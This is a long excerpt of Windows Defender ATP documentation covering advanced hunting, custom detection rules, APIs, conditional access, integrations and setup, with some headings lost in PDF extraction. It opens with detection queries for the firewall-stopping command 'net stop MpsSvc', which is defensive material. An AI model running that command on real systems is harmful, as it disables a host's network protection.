To mitigate DOS command line obfuscation techniques, consider removing quotes, replacing commas with
spaces, and replacing multiple consecutive spaces with a single space. This is just the start of handling DOS
obfuscation techniques, but it does mitigate the most common ones.
The following example query shows various ways to construct a query that looks for the file net.exe to stop the
Windows Defender Firewall service:
// Non-durable query - do not use

ProcessCreationEvents
| where ProcessCommandLine == "net stop MpsSvc"
| limit 10
// Better query - filters on filename, does case-insensitive matches

| where EventTime > ago(7d) and FileName in~ ("net.exe", "net1.exe") and ProcessCommandLine contains "stop"
and ProcessCommandLine contains "MpsSvc"
// Best query also ignores quotes

| where EventTime > ago(7d) and FileName in~ ("net.exe", "net1.exe")
| extend CanonicalCommandLine=replace("\"", "", ProcessCommandLine)
| where CanonicalCommandLine contains "stop" and CanonicalCommandLine contains "MpsSvc"

Custom detections overview
Applies to:
Alerts in Windows Defender ATP are surfaced through the system based on signals gathered from endpoints. With
custom detections, you can create custom queries to monitor events for any kind of behavior such as suspicious or
emerging threats.
This can be done by leveraging the power of Advanced hunting through the creation of custom detection rules.
Custom detections are queries that run periodically every 24 hours and can be configured so that when the query
meets the criteria you set, alerts are created and are surfaced in Windows Defender Security Center. These alerts
will be treated like any other alert in the system.
This capability is particularly useful for scenarios when you want to pro-actively prevent threats and be notified
quickly of emerging threats.
Related topic
Create custom detection rules
Create custom detections rules
Applies to:
1. In the navigation pane, select Advanced hunting.
2. Select an existing query that you'd like to base the monitor on or create a new query.
3. Select Create detection rule.
4. Specify the alert details:
Alert title
Severity
Category
Description
Recommended actions
5. Click Create.
TIP
TIP #1: Running the query for the first time before saving it can help you find any mistakes or errors and give you a preview
of the data you can expect to be returned.
When a new detection rule is created, it will run for the first time (it might take a few minutes) and raise any alerts created by
this rule. After that, the rule will automatically run every 24 hours.
TIP #2: Since the detection automatically runs every 24 hours, it's best to query data in the last 24 hours.
Manage existing custom detection rules

View existing rules in your network, see the last results of each rule, navigate to view all alerts that were created by
each rule. You can also modify existing rules.
1. In the navigation pane, select Settings > Custom detections. You'll see all the detections created in the
system.
2. Select one of the rules to take any of the following actions:
Open related alerts - See all the alerts that were raised based to this rule
Run - Run the selected detection immediately.
NOTE
The next run for the query will be in 24 hours after the last run.
Edit - Modify the settings of the rule.

Modify query - View and edit the query itself.
Turn off - Stop the query from running.
Delete
Related topic
Custom detections overview
Overview of management and APIs
Applies to:
Windows Defender ATP supports a wide variety of options to ensure that customers can easily adopt the platform.
Acknowledging that customer environments and structures can vary, Windows Defender ATP was created with
flexibility and granular control to fit varying customer requirements.
Machine onboarding is fully integrated into System Center Configuration Manager and Microsoft Intune for client
machines and Azure Security Center for server machines, providing complete end-to-end experience of
configuration, deployment, and monitoring. In addition, Windows Defender ATP supports Group Policy and other
third-party tools used for machines management.
Windows Defender ATP provides fine-grained control over what users with access to the portal can see and do
through the flexibility of role-based access control (RBAC ). The RBAC model supports all flavors of security teams
structure:
Globally distributed organizations and security teams
Tiered model security operations teams
Fully segregated devisions with single centralized global security operations teams
The Windows Defender ATP solution is built on top of an integration-ready platform:
It supports integration with a number of security information and event management (SIEM ) solutions and
also exposes APIs to fully support pulling all the alerts and detection information into any SIEM solution.
It supports a rich set of application programming interface (APIs) providing flexibility for those who are already
heavily invested in data enrichment and automation:
Enriching events coming from other security systems with foot print or prevalence information
Triggering file or machine level response actions through APIs
Keeping systems in-sync such as importing machine tags from asset management systems into
Windows Defender ATP, synchronize alerts and incidents status cross ticketing systems with Windows
Defender ATP.
An important aspect of machine management is the ability to analyze the environment from varying and broad
perspectives. This often helps drive new insights and proper priority identification:
The Secure score dashboard provides metrics based method of prioritizing the most important proactive
security measures.
Windows Defender ATP includes a built-in PowerBI based reporting solution to quickly review trends and
details related to Windows Defender ATP alerts and secure score of machines. The platform also supports full
customization of the reports, including mashing of Windows Defender ATP data with your own data stream to
produce business specific reports.
In this section
TOPIC DESCRIPTION
Understand threat intelligence concepts Learn about alert definitions, indicators of compromise, and
other threat intelligence concepts.
Supported Windows Defender ATP APIs Learn more about the individual supported entities where you
can run API calls to and details such as HTTP request values,
request headers and expected responses.
Managed security service provider Get a quick overview on managed security service provider
support.
Related topics
Onboard machines
Enable the custom threat intelligence application
Windows Defender ATP Public API
Create and build Power BI reports using Windows Defender ATP data
Role-based access control
Applies to:
Advanced cybersecurity attacks comprise of multiple complex malicious events, attributes, and contextual
information. Identifying and deciding which of these activities qualify as suspicious can be a challenging task. Your
knowledge of known attributes and abnormal activities specific to your industry is fundamental in knowing when
to call an observed behavior as suspicious.
With Windows Defender ATP, you can create custom threat alerts that can help you keep track of possible attack
activities in your organization. You can flag suspicious events to piece together clues and possibly stop an attack
chain. These custom threat alerts will only appear in your organization and will flag events that you set it to track.
Before creating custom threat alerts, it's important to know the concepts behind alert definitions and indicators of
compromise (IOCs) and the relationship between them.
Alert definitions
Alert definitions are contextual attributes that can be used collectively to identify early clues on a possible
cybersecurity attack. These indicators are typically a combination of activities, characteristics, and actions taken by
an attacker to successfully achieve the objective of an attack. Monitoring these combinations of attributes is
critical in gaining a vantage point against attacks and possibly interfering with the chain of events before an
attacker's objective is reached.
Indicators of compromise (IOC)

IOCs are individually-known malicious events that indicate that a network or machine has already been breached.
Unlike alert definitions, these indicators are considered as evidence of a breach. They are often seen after an
attack has already been carried out and the objective has been reached, such as exfiltration. Keeping track of IOCs
is also important during forensic investigations. Although it might not provide the ability to intervene with an
attack chain, gathering these indicators can be useful in creating better defenses for possible future attacks.
Relationship between alert definitions and IOCs

In the context of Windows Defender ATP, alert definitions are containers for IOCs and defines the alert, including
the metadata that is raised in case of a specific IOC match. Various metadata is provided as part of the alert
definitions. Metadata such as alert definition name of attack, severity, and description is provided along with other
options. For more information on available metadata options, see Threat Intelligence API metadata.
Each IOC defines the concrete detection logic based on its type and value as well as its action, which determines
how it is matched. It is bound to a specific alert definition that defines how a detection is displayed as an alert on
the Windows Defender ATP console.
Here is an example of an IOC:
Type: Sha1
Value: 92cfceb39d57d914ed8b14d0e37643de0797ae56
Action: Equals
IOCs have a many-to-one relationship with alert definitions such that an alert definition can have many IOCs that
correspond to it.
Related topics
Enable the custom threat intelligence API in Windows Defender ATP
Create custom alerts using the threat intelligence API
PowerShell code examples for the custom threat intelligence API
Python code examples for the custom threat intelligence API
Windows Defender ATP API overview
Applies to:
Windows Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those APIs will
enable you to automate workflows and innovate based on Windows Defender ATP capabilities. The API access
requires OAuth2.0 authentication. For more information, see OAuth 2.0 Authorization Code Flow.
In general, you’ll need to take the following steps to use the APIs:
Create an AAD application
Get an access token using this application
Use the token to access Windows Defender ATP API
You can access Windows Defender ATP API with Application Context or User Context.
Application Context: (Recommended)
Used by apps that run without a signed-in user present. for example, apps that run as background services
or daemons.
Steps that need to be taken to access Windows Defender ATP API with application context:
1. Create an AAD Web-Application.
2. Assign the desired permission to the application, for example, 'Read Alerts', 'Isolate Machines'.
3. Create a key for this Application.
4. Get token using the application with its key.
5. Use the token to access Windows Defender ATP API
For more information, see Get access with application context.
User Context:
Used to perform actions in the API on behalf of a user.
Steps that needs to be taken to access Windows Defender ATP API with application context:
1. Create AAD Native-Application.
2. Assign the desired permission to the application, e.g 'Read Alerts', 'Isolate Machines' etc.
3. Get token using the application with user credentials.
For more information, see Get access with user context.
Related topics
Access Windows Defender ATP with application context
Access Windows Defender ATP with user context
Managed security service provider support
Applies to:
Security is recognized as a key component in running an enterprise, however some organizations might not have
the capacity or expertise to have a dedicated security operations team to manage the security of their endpoints
and network, others may want to have a second set of eyes to review alerts in their network.
To address this demand, managed security service providers (MSSP ) offer to deliver managed detection and
response (MDR ) services on top of Windows Defender ATP.
Windows Defender ATP adds support for this scenario and to allow MSSPs to take the following actions:
Get access to MSSP customer's Windows Defender Security Center portal
Get email notifications, and
Fetch alerts through security information and event management (SIEM ) tools
Related topic
Configure managed security service provider integration
Applies to:
security across possible attack surfaces in the modern workplace.
For more information on Microsoft Threat Protection, see Announcing Microsoft Threat Protection.
Microsoft's multiple layers of threat protection across data, applications, devices, and identities can help protect
your organization from advanced cyber threats.
Each layer in the threat protection stack plays a critical role in protecting customers. The deep integration between
these layers results in better protected customers.
Azure Advanced Threat Protection (Azure ATP)

Suspicious activities are processes running under a user context. The integration between Windows Defender ATP
and Azure ATP provides the flexibility of conducting cyber security investigation across activities and identities.
Azure Security Center

Windows Defender ATP provides a comprehensive server protection solution, including endpoint detection and
response (EDR ) capabilities on Windows Servers.
Azure Information Protection

Keep sensitive data secure while enabling productivity in the workplace through data data discovery and data
protection.
Conditional access
Windows Defender ATP's dynamic machine risk score is integrated into the conditional access evaluation,
ensuring that only secure devices have access to resources.

Microsoft Cloud App Security leverages Windows Defender ATP endpoint signals to allow direct visibility into
cloud application usage including the use of unsupported cloud services (shadow IT) from all Windows Defender
ATP monitored machines.
Office 365 Advanced Threat Protection (Office 365 ATP)

Office 365 ATP helps protect your organization from malware in email messages or files through ATP Safe Links,
ATP Safe Attachments, advanced Anti-Phishing, and spoof intelligence capabilities. The integration between Office
365 ATP and Windows Defender ATP enables security analysts to go upstream to investigate the entry point of an
attack. Through threat intelligence sharing, attacks can be contained and blocked.
Skype for Business
The Skype for Business integration provides s a way for analysts to communicate with a potentially compromised
user or device owner through ao simple button from the portal.
Related topic
Protect users, data, and devices with conditional access
Enable conditional access to better protect users,
devices, and data
Applies to:
Conditional access is a capability that helps you better protect your users and enterprise information by making
sure that only secure devices have access to applications.
With conditional access, you can control access to enterprise information based on the risk level of a device. This
helps keep trusted users on trusted devices using trusted applications.
You can define security conditions under which devices and applications can run and access information from your
network by enforcing policies to stop applications from running until a device returns to a compliant state.
The implementation of conditional access in Windows Defender ATP is based on Microsoft Intune (Intune) device
compliance policies and Azure Active Directory (Azure AD ) conditional access policies.
The compliance policy is used with conditional access to allow only devices that fulfill one or more device
compliance policy rules to access applications.
Understand the conditional access flow

Conditional access is put in place so that when a threat is seen on a device, access to sensitive content is blocked
until the threat is remediated.
The flow begins with machines being seen to have a low, medium, or high risk. These risk determinations are then
sent to Intune.
Depending on how you configure policies in Intune, conditional access can be set up so that when certain
conditions are met, the policy is applied.
For example, you can configure Intune to apply conditional access on devices that have a high risk.
In Intune, a device compliance policy is used in conjunction with Azure AD conditional access to block access to
applications. In parallel, an automated investigation and remediation process is launched.
A user can still use the device while the automated investigation and remediation is taking place, but access to
enterprise data is blocked until the threat is fully remediated.
To resolve the risk found on a device, you'll need to return the device to a compliant state. A device returns to a
compliant state when there is no risk seen on it.
There are three ways to address a risk:
1. Use Manual or automated remediation.
2. Resolve active alerts on the machine. This will remove the risk from the machine.
3. You can remove the machine from the active policies and consequently, conditional access will not be applied
on the machine.
Manual remediation requires a secops admin to investigate an alert and address the risk seen on the device. The
automated remediation is configured through configuration settings provided in the following section, Configure
conditional access.
When the risk is removed either through manual or automated remediation, the device returns to a compliant state
and access to applications is granted.
The following example sequence of events explains conditional access in action:
1. A user opens a malicious file and Windows Defender ATP flags the device as high risk.
2. The high risk assessment is passed along to Intune. In parallel, an automated investigation is initiated to
remediate the identified threat. A manual remediation can also be done to remediate the identified threat.
3. Based on the policy created in Intune, the device is marked as not compliant. The assessment is then
communicated to Azure AD by the Intune conditional access policy. In Azure AD, the corresponding policy is
applied to block access to applications.
4. The manual or automated investigation and remediation is completed and the threat is removed. Windows
Defender ATP sees that there is no risk on the device and Intune assesses the device to be in a compliant state.
Azure AD applies the policy which allows access to applications.
5. Users can now access applications.
Related topic
Configure conditional access in Windows Defender ATP
Microsoft Cloud App Security in Windows Defender
ATP overview
Applies to:
IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.
Microsoft Cloud App Security (Cloud App Security) is a comprehensive solution that gives visibility into cloud apps
and services by allowing you to control and limit access to cloud apps, while enforcing compliance requirements
on data stored in the cloud. For more information, see Cloud App Security.
NOTE
This feature is available with an E5 license for Enterprise Mobility + Security on machines running Windows 10 version 1809
or later.
Windows Defender ATP and Cloud App Security integration

Cloud App Security discovery relies on cloud traffic logs being forwarded to it from enterprise firewall and proxy
servers. Windows Defender ATP integrates with Cloud App Security by collecting and forwarding all cloud app
networking activities, providing unparalleled visibility to cloud app usage. The monitoring functionality is built into
the device, providing complete coverage of network activity.
The integration provides the following major improvements to the existing Cloud App Security discovery:
Available everywhere - Since the network activity is collected directly from the endpoint, it's available
wherever the device is, on or off corporate network, as it's no longer depended on traffic routed through the
enterprise firewall or proxy servers.
Works out of the box, no configuration required - Forwarding cloud traffic logs to Cloud App Security
requires firewall and proxy server configuration. With the Windows Defender ATP and Cloud App Security
integration, there's no configuration required. Just switch it on in Windows Defender Security Center
settings and you're good to go.
Device context - Cloud traffic logs lack device context. Windows Defender ATP network activity is reported
with the device context (which device accessed the cloud app), so you are able to understand exactly where
(device) the network activity took place, in addition to who (user) performed it.
For more information about cloud discovery, see Working with discovered apps.
Related topic
Configure Microsoft Cloud App Security integration
Applies to:
IMPORTANT
Information protection is an integral part of Microsoft 365 Enterprise suite, providing intelligent protection to keep
sensitive data secure while enabling productivity in the workplace.
Windows Defender ATP is seamlessly integrated in Microsoft Threat Protection to provide a complete and
comprehensive data loss prevention (DLP ) solution for Windows devices. This solution is delivered and managed
as part of the unified Microsoft 365 information protection suite.
TIP
Read our blog post about how Windows Defender ATP integrates with Microsoft Information Protection to discover, protect,
and monitor sensitive data on Windows devices.
Windows Defender ATP applies two methods to discover and protect data:
Data discovery - Identify sensitive data on Windows devices at risk
Data protection - Windows Information Protection (WIP ) as outcome of Azure Information Protection label
Data discovery
Windows Defender ATP automatically discovers files with sensitivity labels on Windows devices when the feature
is enabled. You can enable the Azure Information Protection integration feature from Windows Defender Security
Center. For more information, see Configure advanced features.
After enabling the Azure Information Protection integration, data discovery signals are immediately forwarded to
Azure Information Protection from the device. When a labeled file is created or modified on a Windows device,
Windows Defender ATP automatically reports the signal to Azure Information Protection.
The reported signals can be viewed on the Azure Information Protection - Data discovery dashboard.
Azure Information Protection - Data discovery dashboard
This dashboard presents a summarized discovery information of data discovered by both Windows Defender ATP
and Azure Information Protection. Data from Windows Defender ATP is marked with Location Type - Endpoint.
Notice the Device Risk column on the right, this device risk is derived directly from Windows Defender ATP,
indicating the risk level of the security device where the file was discovered, based on the active security threats
detected by Windows Defender ATP.
Clicking the device risk level will redirect you to the device page in Windows Defender ATP, where you can get a
comprehensive view of the device security status and its active alerts.
NOTE
Windows Defender ATP does not currently report the Information Types.
Log Analytics
Data discovery based on Windows Defender ATP is also available in Azure Log Analytics, where you can perform
complex queries over the raw data.
For more information on Azure Information Protection analytics, see Central reporting for Azure Information
Protection.
Open Azure Log Analytics in Azure Portal and open a query builder (standard or classic).
To view Windows Defender ATP data, perform a query that contains:
InformationProtectionLogs_CL
| where Workload_s == "Windows Defender"
Prerequisites:
Customers must have a subscription for Azure Information Protection.
Enable Azure Information Protection integration in Windows Defender Security Center:
Go to Settings in Windows Defender Security Center, click on Advanced Settings under General.
Data protection
For data to be protected, they must first be identified through labels. Sensitivity labels are created in Office Security
and Compliance (SCC ). Windows Defender ATP then uses the labels to identify endpoints that need Windows
Information Protection (WIP ) applied on them.
When you create sensitivity labels, you can set the information protection functionalities that will be applied on the
file. The setting that applies to Windows Defender ATP is the Data loss prevention. You'll need to turn on the Data
loss prevention and select Enable Windows end point protection (DLP for devices).
Once, the policy is set and published, Windows Defender ATP automatically enables WIP for labeled files. When a
labeled file is created or modified on a Windows device, Windows Defender ATP automatically detects it and
enables WIP on that file if its label corresponds with Office Security and Compliance (SCC ) policy.
This functionality expands the coverage of WIP to protect files based on their label, regardless of their origin.
For more information, see Configure information protection in Windows.
Related topics
How Windows Information Protection protects files with a sensitivity label
Applies to:
IMPORTANT
Microsoft Threat Experts is a managed hunting service that provides Security Operation Centers (SOCs) with
expert level monitoring and analysis to help them ensure that critical threats in their unique environments don’t
get missed.
This new capability provides expert-driven insights and data through targeted attack notification and access to
experts on demand.
Targeted attack notification

Microsoft Threat Experts provides proactive hunting for the most important threats to your network, including
human adversary intrusions, hands-on-keyboard attacks, or advanced attacks like cyberespionage. The managed
hunting service includes:
Threat monitoring and analysis, reducing dwell time and risk to the business
Hunter-trained artificial intelligence to discover and prioritize both known and unknown attacks
Identifying the most important risks, helping SOCs maximize time and energy
Scope of compromise and as much context as can be quickly delivered to enable fast SOC response.
Collaborate with experts, on demand

NOTE
The Microsoft Threat Experts' experts-on-demand capability is still in preview. You can only use the experts-on-demand
capability if you have applied for preview and your application has been approved.
Customers can engage our security experts directly from within Windows Defender Security Center for timely and
accurate response. Experts provide insights needed to better understand the complex threats affecting your
organization, from alert inquiries, potentially compromised machines, root cause of a suspicious network
connection, to additional threat intelligence regarding ongoing advanced persistent threat campaigns. With this
capability, you can:
Get additional clarification on alerts including root cause or scope of the incident
Gain clarity into suspicious machine behavior and next steps if faced with an advanced attacker
Determine risk and protection regarding threat actors, campaigns, or emerging attacker techniques
Seamlessly transition to Microsoft Incident Response (IR ) or other third-party Incident Response services when
necessary
Related topic
Configure Microsoft Threat Experts capabilities
portal overview
Applies to:
Enterprise security teams can use Windows Defender Security Center to monitor and assist in responding to alerts
of potential advanced persistent threat (APT) activity or data breaches.
You can use Windows Defender Security Center to:
View, sort, and triage alerts from your endpoints
Search for more information on observed indicators such as files and IP Addresses
Change Windows Defender ATP settings, including time zone and review licensing information.
Windows Defender Security Center

When you open the portal, you’ll see the main areas of the application:
(1) Navigation pane
(2) Main portal
(3) Search, Community center, Time settings, Help and support, Feedback
NOTE
Malware related detections will only appear if your machines are using Windows Defender Antivirus as the default real-time
protection antimalware product.
You can navigate through the portal using the menu options available in all sections. Refer to the following table
for a description of each section.
AREA DESCRIPTION
(1) Navigation pane Use the navigation pane to move between the Dashboards,
Alerts queue, Automated investigations, Machines list,
Service health, Advanced hunting, and Settings.
AREA DESCRIPTION
Dashboards Access the Security operations, the Secure Score, or Threat

analytics dashboard.
Incidents View alerts that have been aggregated as incidents.
Alerts View alerts generated from machines in your organizations.
Automated investigations Displays a list of automated investigations that's been

conducted in the network, the status of each investigation
and other details such as when the investigation started and
the duration of the investigation.
Advanced hunting Advanced hunting allows you to proactively hunt and

investigate across your organization using a powerful search
and query tool.
Machines list Displays the list of machines that are onboarded to Windows
Defender ATP, some information about them, and the
corresponding number of alerts.
Service health Provides information on the current status of the Window

Defender ATP service. You'll be able to verify that the service
health is healthy or if there are current issues.
Settings Shows the settings you selected during onboarding and lets
you update your industry preferences and retention policy
period. You can also set other configuration settings such as
email notifications, activate the preview experience, enable or
turn off advanced features, SIEM integration, threat intel API,
build Power BI reports, and set baselines for the Secure Score
dashboard.
(2) Main portal Main area where you will see the different views such as the
Dashboards, Alerts queue, and Machines list.
(3) Community center, Time settings, Help and support, Community center -Access the Community center to learn,
Feedback collaborate, and share experiences about the product.
Time settings - Gives you access to the configuration
settings where you can set time zones and view license
information.
Help and support - Gives you access to the Windows

Defender ATP guide, Microsoft support, and Premier support.
Feedback - Access the feedback button to provide comments

about the portal.
Windows Defender ATP icons

The following table provides information on the icons used all throughout the portal:
ICON DESCRIPTION
Windows Defender ATP logo

ICON DESCRIPTION
Alert – Indication of an activity correlated with advanced

attacks.
Detection – Indication of a malware threat detection.
Active threat – Threats actively executing at the time of

detection.
Remediated – Threat removed from the machine.
Not remediated – Threat not removed from the machine.
Indicates events that triggered an alert in the Alert process

tree.
Machine icon
Windows Defender Antivirus events
Windows Defender Application Guard events
Windows Defender Device Guard events
Windows Defender Exploit Guard events
Windows Defender SmartScreen events
Windows Firewall events
Response action
Process events
Network events
File events
Registry events
Load DLL events
Other events
Access token modification

ICON DESCRIPTION
File creation
Signer
File path
Command line
Unsigned file
Process tree
Memory allocation
Process injection
Powershell command run
Community center
Notifications
Automated investigation - no threats found
Automated investigation - failed
Automated investigation - partially investigated
Automated investigation - terminated by system
Automated investigation - pending
Automated investigation - running
Automated investigation - remediated
Automated investigation - partially remediated

ICON DESCRIPTION
Threat & Vulnerability Management - threat insights
Threat & Vulnerability Management - possible active alert
Threat & Vulnerability Management - recommendation

insights
Related topics
Understand the Windows Defender Advanced Threat Protection portal
View the Security operations dashboard
View the Secure Score dashboard and improve your secure score
View the Threat analytics dashboard and take recommended mitigation actions
Get started with Windows Defender Advanced Threat
Protection
Applies to:
TIP
Learn about the minimum requirements and initial steps you need to take to get started with Windows Defender
ATP.
The following capabilities are available across multiple products that make up the Windows Defender ATP
platform.
Effectively identifying, assessing, and remediating endpoint weaknesses is pivotal in running a healthy security
program and reducing organizational risk. This infrastructure correlates endpoint detection and response (EDR )
insights with endpoint vulnerabilities real-time, thus reducing organizational vulnerability exposure and increasing
threat resilience.
threats that may have made it past the first two security pillars.
Auto investigation and remediation
Secure score
Windows Defender ATP provides a security posture capability to help you dynamically assess the security state of
your enterprise network, identify unprotected systems, and take recommended actions to improve the overall
security state of your network.
Microsoft Threat Experts is the new managed threat hunting service in Windows Defender ATP that provides
proactive hunting, prioritization, and additional context and insights that further empower security operations
centers (SOCs) to identify and respond to threats quickly and accurately. It provides additional layer of expertise
and optics that Microsoft customers can utilize to augment security operation capabilities as part of Microsoft 365.
Advanced hunting
Advanced hunting allows you to hunt for possible threats across your organization using a powerful search and
query tool. You can also create custom detection rules based on the queries you created and surface alerts in
Windows Defender Security Center.
Management and APIs
Microsoft threat protection
Bring the power of Microsoft Threat Protection to your organization.
In this section
TOPIC DESCRIPTION
Minimum requirements Learn about the requirements for onboarding machines to the
platform.
Validate licensing and complete setup Get guidance on how to check that licenses have been
provisioned to your organization and how to access the portal
for the first time.
Preview features Learn about new features in the Windows Defender ATP
preview release and be among the first to try upcoming
features by turning on the preview experience.
Data storage and privacy Explains the data storage and privacy details related to
Assign user access to the portal Set permissions to manage who can access the portal. You can
set basic permissions or set granular permissions using role-
based access control (RBAC).
Evaluate Windows Defender ATP Evaluate the various capabilities in Windows Defender ATP and
test features out.
Access the Windows Defender Security Center Community The Windows Defender ATP Community Center is a place
Center where community members can learn, collaborate, and share
experiences about the product.
What's new in Windows Defender ATP
Applies to:
Here are the new features in the latest release of Windows Defender ATP as well as security features in Windows
10 and Windows Server.
May 2019
The following capability is generally available (GA).
Threat protection reports
The threat protection report provides high-level information about alerts generated in your organization.
Microsoft Threat Experts is the new managed threat hunting service in Windows Defender ATP that
provides proactive hunting, prioritization, and additional context and insights that further empower security
operations centers (SOCs) to identify and respond to threats quickly and accurately. It provides additional
layer of expertise and optics that Microsoft customers can utilize to augment security operation capabilities
as part of Microsoft 365.
April 2019
The following capability is generally available (GA).
Microsoft Threat Experts Targeted Attack Notification capability
Microsoft Threat Experts' Targeted Attack Notification alerts are tailored to organizations to provide as
much information as can be quickly delivered thus bringing attention to critical threats in their network,
including the timeline, scope of breach, and the methods of intrusion.
Microsoft Defender ATP API
Microsoft Defender ATP exposes much of its data and actions through a set of programmatic APIs. Those
APIs will enable you to automate workflows and innovate based on Windows Defender ATP capabilities.
In preview
The following capabilities are included in the April 2019 preview release.
A new built-in capability that uses a risk-based approach to the discovery, prioritization, and remediation of
endpoint vulnerabilities and misconfigurations.
Interoperability
Microsoft Defender ATP supports third-party applications to help enhance the detection, investigation, and
threat intelligence capabilities of the platform.
March 2019
In preview
The following capability are included in the March 2019 preview release.
Machine health and compliance report The machine health and compliance report provides high-level
information about the devices in your organization.
February 2019
The following capabilities are generally available (GA).
Incidents
Incident is a new entity in Windows Defender ATP that brings together all relevant alerts and related entities
to narrate the broader attack story, giving analysts better perspective on the purview of complex threats.
Onboard supported versions of Windows machines so that they can send sensor data to the Windows
Defender ATP sensor.
October 2018
The following capabilities are generally available (GA).
All Attack surface reduction rules are now supported on Windows Server 2019.
Controlled folder access is now supported on Windows Server 2019.
Custom detection
With custom detections, you can create custom queries to monitor events for any kind of behavior such as
suspicious or emerging threats. This can be done by leveraging the power of Advanced hunting through the
creation of custom detection rules.
Integration with Azure Security Center
Windows Defender ATP integrates with Azure Security Center to provide a comprehensive server
protection solution. With this integration Azure Security Center can leverage the power of Windows
Defender ATP to provide improved threat detection for Windows Servers.
Managed security service provider (MSSP ) support
Windows Defender ATP adds support for this scenario by providing MSSP integration. The integration will
allow MSSPs to take the following actions: Get access to MSSP customer's Windows Defender Security
Center portal, fetch email notifications, and fetch alerts through security information and event
management (SIEM ) tools.
Removable device control
Windows Defender ATP provides multiple monitoring and control features to help prevent threats from
removable devices, including new settings to allow or block specific hardware IDs.
Support for iOS and Android devices
iOS and Android devices are now supported and can be onboarded to the service.
Threat analytics
Threat Analytics is a set of interactive reports published by the Windows Defender ATP research team as
soon as emerging threats and outbreaks are identified. The reports help security operations teams assess
impact on their environment and provides recommended actions to contain, increase organizational
resilience, and prevent specific threats.
New in Windows 10 version 1809, there are two new attack surface reduction rules:
Block Adobe Reader from creating child processes
Block Office communication application from creating child processes.
Windows Defender Antivirus
Antimalware Scan Interface (AMSI) was extended to cover Office VBA macros as well. Office VBA +
AMSI: Parting the veil on malicious macros.
Windows Defender Antivirus, new in Windows 10 version 1809, can now run within a sandbox (preview ),
increasing its security.
Configure CPU priority settings for Windows Defender Antivirus scans.
In preview
The following capabilities are included in the October 2018 preview release.
For more information on how to turn on preview features, see Preview features.
Information protection
Information protection is an integral part of Microsoft 365 Enterprise suite, providing intelligent protection
to keep sensitive data secure while enabling productivity in the workplace. Windows Defender ATP is
seamlessly integrated in Microsoft Threat Protection to provide a complete and comprehensive data loss
prevention (DLP ) solution for Windows devices.
NOTE
Partially available from Windows 10, version 1809.
Integration with Microsoft Cloud App Security

Microsoft Cloud App Security leverages Windows Defender ATP endpoint signals to allow direct visibility
into cloud application usage including the use of unsupported cloud services (shadow IT) from all Windows
Defender ATP monitored machines.
NOTE
Available from Windows 10, version 1809 or later.
Onboard Windows Server 2019

Windows Defender ATP now adds support for Windows Server 2019. You'll be able to onboard Windows
Server 2019 in the same method available for Windows 10 client machines.
Power BI reports using Windows Defender ATP data
Windows Defender ATP makes it easy to create a Power BI dashboard by providing an option straight from
the portal.
March 2018
Advanced Hunting
Query data using Advanced hunting in Windows Defender ATP.
New attack surface reduction rules:
Use advanced protection against ransomware
Block credential stealing from the Windows local security authority subsystem (lsass.exe)
Block untrusted and unsigned processes that run from USB
Block executable content from email client and webmail
Use Automated investigations to investigate and remediate threats.
NOTE
Available from Windows 10, version 1803 or later.
Conditional access
Enable conditional access to better protect users, devices, and data.
Windows Defender ATP Community center
The Windows Defender ATP Community Center is a place where community members can learn,
collaborate, and share experiences about the product.
You can now block untrusted processes from writing to disk sectors using Controlled Folder Access.
Windows Defender ATP provides a centralized security operations experience for Windows as well as non-
Windows platforms. You'll be able to see alerts from various supported operating systems (OS ) in Windows
Defender Security Center and better protect your organization's network.
Role-based access control (RBAC )
Using role-based access control (RBAC ), you can create roles and groups within your security operations
team to grant appropriate access to the portal.
Windows Defender Antivirus now shares detection status between M365 services and interoperates with
Windows Defender ATP. For more information, see Use next-gen technologies in Windows Defender
Antivirus through cloud-delivered protection.
Block at first sight can now block non-portable executable files (such as JS, VBS, or macros) as well as
executable files. For more information, see Enable block at first sight.
Minimum requirements for Windows Defender ATP
Applies to:
There are some minimum requirements for onboarding machines to the service.
TIP
Licensing requirements
Windows Defender Advanced Threat Protection requires one of the following Microsoft Volume Licensing offers:
Windows 10 Enterprise E5
Windows 10 Education E5
Microsoft 365 E5 (M365 E5) which includes Windows 10 Enterprise E5
For more information on the array of features in Windows 10 editions, see Compare Windows 10 editions.
For a detailed comparison table of Windows 10 commercial edition comparison, see the comparison PDF.
For more information about licensing requirements for Windows Defender ATP platform on Windows Server, see
Protecting Windows Servers with Windows Defender ATP.
Related topic
Validate licensing and complete setup
Onboard machines
Validate licensing provisioning and complete set up
for Windows Defender ATP
Applies to:
Check license state

Checking for the license state and whether it got properly provisioned, can be done through the Office 365
admin center or through the Microsoft Azure portal.
1. In the Office 365 admin center navigate to Billing > Subscriptions.
On the screen you will see all the provisioned licenses and their current Status.
2. To view your licenses go to the Microsoft Azure portal and navigate to the Microsoft Azure portal license
section.
Cloud Service Provider validation

To gain access into which licenses are provisioned to your company, and to check the state of the licenses, go to
the Office 365 admin center.
1. From the Partner portal, click on the Administer services > Office 365.
2. Clicking on the Partner portal link will leverage the Admin on behalf option and will give you access to
the customer Office 365 admin center.
Access Windows Defender Security Center for the first time

When accessing Windows Defender Security Center for the first time there will be a setup wizard that will guide
you through some initial steps. At the end of the setup wizard there will be a dedicated cloud instance of Windows
Defender ATP created.
1. Each time you access the portal you will need to validate that you are authorized to access the product. This
Set up your permissions step will only be available if you are not currently authorized to access the
product.
Once the authorization step is completed, the Welcome screen will be displayed.
2. The Welcome screen will provide some details as to what is about to occur during the set up wizard.
You will need to set up your preferences for Windows Defender Security Center.
3. Set up preferences
a. Select data storage location

When onboarding the service for the first time, you can choose to store your data in the Microsoft
Azure datacenters in the United States, the European Union, or the United Kingdom. Once
configured, you cannot change the location where your data is stored. This provides a convenient
way to minimize compliance risk by actively selecting the geographic locations where your data will
reside. Microsoft will not transfer the data from the specified geolocation.
WARNING
This option cannot be changed without completely offboarding from Windows Defender ATP and completing
a new enrollment process.
b. Select the data retention policy
Windows Defender ATP will store data up to a period of 6 months in your cloud instance, however,
you have the option to set the data retention period for a shorter timeframe during this step of the
set up process.
NOTE
This option can be changed at a later time.
c. Select the size of your organization

You will need to indicate the size of your organization based on an estimate of the number of
employees currently employed.
NOTE
The organization size question is not related to how many licenses were purchased for your organization. It
is used by the service to optimize the creation of the data cluster for your organization.
d. Turn on preview features

Learn about new features in the Windows Defender ATP preview release and be among the first to
try upcoming features by turning on Preview features.
You'll have access to upcoming features which you can provide feedback on to help improve the
overall experience before features are generally available.
Toggle the setting between On and Off to choose Preview features.
NOTE
